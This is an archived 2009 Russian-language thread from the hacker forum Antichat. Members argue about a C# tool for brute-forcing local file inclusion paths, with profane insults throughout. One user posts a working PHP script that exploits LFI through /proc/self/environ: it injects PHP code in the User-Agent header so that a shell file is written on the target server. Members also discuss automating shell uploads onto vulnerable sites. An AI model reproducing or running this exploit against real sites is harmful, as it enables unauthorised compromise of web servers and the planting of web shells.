Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
14.12.2009, 16:43
|
|
Moderator - Level 7
Регистрация: 07.06.2006
Сообщений: 556
Провел на форуме:
7549607
Репутация:
2702
|
|
перекачай.
|
|
|
14.12.2009, 17:59
|
|
Banned
Регистрация: 02.12.2009
Сообщений: 23
Провел на форуме:
48201
Репутация:
-55
|
|
Собирался аналогичную писать.
ЗЫ прогу потестил. не очень понравилось.
слишком навящивый фуннкционал.
нахуя там переменую вставлять?
нахуя всякие счётчики трафика? в деревне живёшь?
короче ТС делать было просто не xyй.
надо было сделать поле, куда путь например до /etc/passwd копипаститься. а прога сама отпрасит, где корень, и где какая переменная.
и нет автозаливателся шелла в /proc/self/environ , что очень важно.
ещё бы можно было добавиь парсер темы с инклудами на ачате. что вообще прекрасно бы было. и ещё надо сделать список с инлудами, чтобы сканить сразу 10 инлудов и пить кофе в это время.
короче написано на языке для блондинок (C#), блондином.
будет время сам на C++ Builder напишу, а позже и на WinSock перепишу.
Последний раз редактировалось Matnya; 14.12.2009 в 18:17..
|
|
|
|
14.12.2009, 18:28
|
|
Участник форума
Регистрация: 01.08.2009
Сообщений: 183
Провел на форуме:
1483264
Репутация:
131
|
|
Мат неуместен =/, учитесь выражать мысли
Такое и на php можно накодить.
PS: Добавьте выбор задержки в мс  |
|
|
|
14.12.2009, 18:28
|
|
Moderator - Level 7
Регистрация: 07.06.2006
Сообщений: 556
Провел на форуме:
7549607
Репутация:
2702
|
|
нахуя там переменую вставлять?
Как ты собрался брутить если у тебя будет LFI в POST или Cookie?
нахуя всякие счётчики трафика? в деревне живёшь?
Для красоты.,,
ещё бы можно было добавиь парсер темы с инклудами на ачате. что вообще прекрасно бы было
Привязка к конкретному сайту - не комильфо с точки зрения архитектуры.
и ещё надо сделать список с инлудами, чтобы сканить сразу 10 инлудов и пить кофе в это время.
Планируется.
И вообще, чего ты такой нервный?
Расслабься, выпей чаю...
|
|
|
|
14.12.2009, 18:33
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от Matnya
и нет автозаливателся шелла в /proc/self/environ , что очень важно.
большего бреда в жизни не читал. Автоматизация залития шелла - это сильно (в случае брута путей). Нереально сильно. Вот сам лентяй, но чтобы "шелл ручками было западло залить" - не, ну это шедеврально. Кроме того, что просто глупо.
Последний раз редактировалось Pashkela; 14.12.2009 в 18:37..
|
|
|
|
14.12.2009, 18:49
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.03.2007
Сообщений: 1,985
Провел на форуме:
3288241
Репутация:
3349
|
|
2 Matnya
короче написано на языке для блондинок (C#), блондином.
будет время сам на C++ Builder напишу, а позже и на WinSock перепишу.
По твоей логики, можно сказать что Delphi - для умственно отсталых.
А если учесть что C++ Builder - это таже жопа, только с другова ракурса, то мне страшно подумать кто ты тогда.
и нет автозаливателся шелла в /proc/self/environ , что очень важно.
Ты жжош. вариант залива шела через него невелик. Темболее что есть куда других альтернатив. И ты предлагаешь их всех реализовывать в проге?
Может ты хочешь вообще прогу с полем ввода сайта и кнопкой ХАК??
И вообще в таких проектах не имеет значение на каком языке они написаны, потому что тут врядли будет такая уж большая скорость брута, чтобы заметить разницу в производительности языков |
|
|
|
14.12.2009, 18:55
|
|
Постоянный
Регистрация: 20.12.2007
Сообщений: 334
Провел на форуме:
1934122
Репутация:
118
|
|
Автору плюсы за старание!
И вообще в таких проектах не имеет значение на каком языке они написаны, потому что тут врядли будет такая уж большая скорость брута, чтобы заметить разницу в производительности языков
С точки зрение кроссплатформенности имеет значение) |
|
|
|
14.12.2009, 20:07
|
|
Banned
Регистрация: 02.12.2009
Сообщений: 23
Провел на форуме:
48201
Репутация:
-55
|
|
Сообщение от Pashkela
большего бреда в жизни не читал.
Да ладно??!!
Сообщение от Pashkela
Автоматизация залития шелла - это сильно (в случае брута путей). Нереально сильно. Вот сам лентяй, но чтобы "шелл ручками было западло залить" - не, ну это шедеврально. Кроме того, что просто глупо.
Я имею автоматизацию залития в /proc/self/environ
а не в др. логи. это вполне выполнимо легко. скрипт кодил 1 минуту на пыхе. там тупо код в юзер агент выставляеться. надо сделать так: если /proc/self/environ существует, то прога залвает шелл через него.
PHP код:
<?php
$host = "www.ыапывпывпывп.org";
$port = 80;
$script = "/index.php?page=../../../../../../../proc/self/environ";
$sock = fsockopen($host,$port);
if(!$sock)
echo "Error";
else
{
$head = "POST $script HTTP/1.1\r\n";
$head .= "Host: $host\r\n";
$head .= 'User-Agent: <?php fwrite(fopen("shell.php","w+"),"<?php phpinfo(); ?>");?>\r\n';
$head .= "Accept-Language: ru\r\n";
$head .= "Content-Type: application/x-www-form-urlencoded\r\n";
$head .= "Content-Lenght: ".strlen("<?php phpinfo(); ?>")."\r\n";
$head .= "\r\n<?php phpinfo(); ?>\r\n";
fwrite($sock,$head);
while(!feof($sock))
{
$respons .= fgets($sock,1024);
}
fclose($sock);
}
?>
Сообщение от slesh
Ты жжош. вариант залива шела через него невелик.
ну ты мега-кодер просто не знаеш что такое /proc/self/environ. ты же встётаки масдайщег-кодер 
если на сайте инлудиться это файлег, то 100% шелл.
Сообщение от slesh
И вообще в таких проектах не имеет значение на каком языке они написаны, потому что тут врядли будет такая уж большая скорость брута, чтобы заметить разницу в производительности языков
Бред. Ачат вроде как хек прожект. А те, кто кроме пыха и подстоновки кавычек нихуя больше не умеют, те не хеккеры. Кстати я бы в РОА не брал тех кто не умеют на сях кодить
Последний раз редактировалось Matnya; 14.12.2009 в 20:13..
|
|
|
|
14.12.2009, 20:44
|
|
Участник форума
Регистрация: 01.08.2009
Сообщений: 183
Провел на форуме:
1483264
Репутация:
131
|
|
я бы в РОА не брал тех кто не умеют на сях кодить
А кого волнует твоё мнение?))
|
|
|
|
14.12.2009, 20:45
|
|
Banned
Регистрация: 02.12.2009
Сообщений: 23
Провел на форуме:
48201
Репутация:
-55
|
|
Сообщение от DeluxeS
А кого волнует твоё мнение?))
свали в туман. не тебе был пост.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [x26]VOLAND](/avatars/avatar24925.gif){kind=avatar}
![Отправить сообщение для [x26]VOLAND с помощью ICQ](fusion/misc/im_icq.gif)
![Отправить сообщение для [x26]VOLAND с помощью AIM](fusion/misc/im_aim.gif)
![Аватар для shellz[21h]](/avatars/avatar46780.gif){kind=avatar}
Линейный вид
